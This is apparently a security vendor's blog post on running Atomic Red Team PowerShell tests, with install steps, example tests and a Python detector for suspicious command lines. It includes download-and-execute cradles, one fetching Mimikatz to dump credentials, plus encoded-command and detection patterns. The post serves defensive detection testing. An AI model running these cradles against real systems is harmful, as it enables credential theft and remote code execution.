Atomic Red Team PowerShell Tests: Examples & How to Run


Atomic Red Team is an open-source library of small, focused tests mapped to the MITRE ATT&CK framework. These tests simulate real adversary behaviors to help security teams validate detection rules, EDR coverage, logging, and response capabilities.

PowerShell is one of the most common execution methods in attacks (MITRE technique T1059.001, Command and Scripting Interpreter: PowerShell), so Atomic Red Team includes many dedicated tests for it. These tests emulate techniques such as downloading and executing payloads, running encoded commands, launching credential dumping tools, and running discovery scripts, all in a safe, controlled way.

The primary way to run them is through Invoke-AtomicRedTeam, a PowerShell module that executes the tests (with setup, execution, and cleanup options).

Getting Started with Atomic Red Team for PowerShell
1. Install Invoke-AtomicRedTeam (the execution framework). Run this in PowerShell (running as administrator is recommended for full coverage):
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'); Install-AtomicRedTeam -getAtomics
This downloads the module and the full atomics folder (the test definitions).
Or install just the module from the PowerShell Gallery (the full set of test definitions is not needed for remote execution):
Install-Module -Name Invoke-AtomicRedTeam -Scope CurrentUser

2. Import the Module
Import-Module Invoke-AtomicRedTeam

3. List the PowerShell tests. Most PowerShell tests live under T1059.001 (they also appear under other techniques, such as the older, now-deprecated T1086 PowerShell ID, or T1547 for persistence). View a brief summary:
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
Or full details:
Invoke-AtomicTest T1059.001 -ShowDetails

Common PowerShell-Focused Atomic Tests (Examples from T1059.001 and Related)
These are popular tests for exercising detection of PowerShell abuse:
1. Atomic Test #1 – Invoke Mimikatz (Credential Dumping via PowerShell). Downloads and runs a Mimikatz variant in memory (the classic PowerShell download cradle). Command example:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCreds"

Exercises: process creation (powershell.exe), network download, suspicious command-line arguments, and in-memory execution.

2. Atomic Test #3 – Run BloodHound from memory using a download cradle. Downloads the BloodHound SharpHound collector via a PowerShell HTTP request and runs it in memory. Detection opportunities: outbound connections to GitHub raw content, SharpHound execution patterns.

3. Encoded command execution. These tests use Base64-encoded PowerShell to evade simple command-line detection. For example:
powershell.exe -EncodedCommand <base64 string of malicious script>

Ideal for testing whether your SIEM/EDR detects obfuscated PowerShell commands.

4. Remote script download and execution. A simple cradle:
powershell.exe -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1')"

Exercises both network and execution telemetry.

Many other techniques use PowerShell indirectly (e.g., T1547.001 Boot or Logon Autostart Execution via registry run keys set with PS, or T1113 Screen Capture via PS scripts).

Running a Test (Example)
1. To run a specific test safely:
Invoke-AtomicTest T1059.001 -TestNumbers 1
Add -Confirm:$false to skip prompts.

2. If your tests aren't in the default location, point to them with -PathToAtomicsFolder.

3. Cleanup is often performed for you, but verify whether manual cleanup is needed by checking the per-test YAML files.

Practical Tips for Your Environment
1. It's best to start testing in a VM or other isolated testing machine (never in production unless approved to do so).

2. Use your EDR/SIEM to monitor for powershell.exe launched as a child of explorer.exe or cmd.exe (and the child processes powershell.exe itself spawns), as well as suspicious command-line arguments such as -EncodedCommand, -WindowStyle Hidden, IEX/DownloadString, and outbound connections to raw.githubusercontent.com or pastebin-like sites.

3. Test variations: run the tests with and without Constrained Language Mode, and with AMSI enabled and disabled, to identify gaps in how each test is detected under each set of restrictions.

4. The community adds new tests to Atomic Red Team regularly, so check GitHub for the most up-to-date tests.
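As an added example (not code from this post or from the Atomic Red Team project), the following Python sketches the detection side of tip 2 and of the encoded-command test above: it takes constructed process-creation events modelled on the cradles shown earlier, decodes any -EncodedCommand payload (Base64 of the script's UTF-16LE bytes), and flags the indicators the post lists. The event field names (parent, image, cmd) are an assumption about how your telemetry is shaped.

```python
import base64
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Windows 4688 shape), modelled on
# the cradles above; not real captures. -EncodedCommand takes Base64 of the script's UTF-16LE bytes.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCreds\""},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -EncodedCommand " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/"
         "redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1')"
         .encode("utf-16le")).decode("ascii")},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\inventory.ps1"},  # benign scheduled script
]

# PowerShell accepts abbreviated switches, so match the common spellings of -EncodedCommand.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
INDICATORS = [  # (name, pattern); the cradle check accepts IEX before or after the download call
    ("download_cradle", re.compile(
        r"\b(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest)"
        r"|(?:DownloadString|DownloadFile|Invoke-WebRequest).*\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("hidden_window", re.compile(r"-w\w*\s+hidden", re.I)),
    ("exec_policy_bypass", re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)),
    ("suspicious_host", re.compile(r"raw\.githubusercontent\.com|pastebin", re.I)),
    ("known_tooling", re.compile(r"Invoke-Mimikatz|SharpHound|Invoke-BloodHound", re.I)),
]
SUSPICIOUS_PARENTS = {"explorer.exe", "cmd.exe"}

def decode_encoded_command(cmd):
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # malformed Base64 or not UTF-16LE
        return None

def analyze(event):
    """Return the names of the indicators that fire for one process-creation event."""
    decoded = decode_encoded_command(event["cmd"])
    findings = ["encoded_command"] if decoded is not None else []
    # Scan the decoded script as well, so encoding alone does not hide the cradle.
    text = event["cmd"] + ("\n" + decoded if decoded else "")
    findings += [name for name, rx in INDICATORS if rx.search(text)]
    if event["image"].lower() == "powershell.exe" and event["parent"].lower() in SUSPICIOUS_PARENTS:
        findings.append("parent:" + event["parent"].lower())
    return findings
```

Run each event through analyze() while the atomic tests execute and compare the indicators that fire with what your EDR/SIEM actually alerted on; the benign third event should stay clean.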

Atomic Red Team’s PowerShell tests are designed to be quick to run (most take less than 5 minutes), portable in nature, and directly tied to real-world ATT&CK techniques, which makes them ideal for blue team validation, purple team exercises, and proving detection rules.

© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067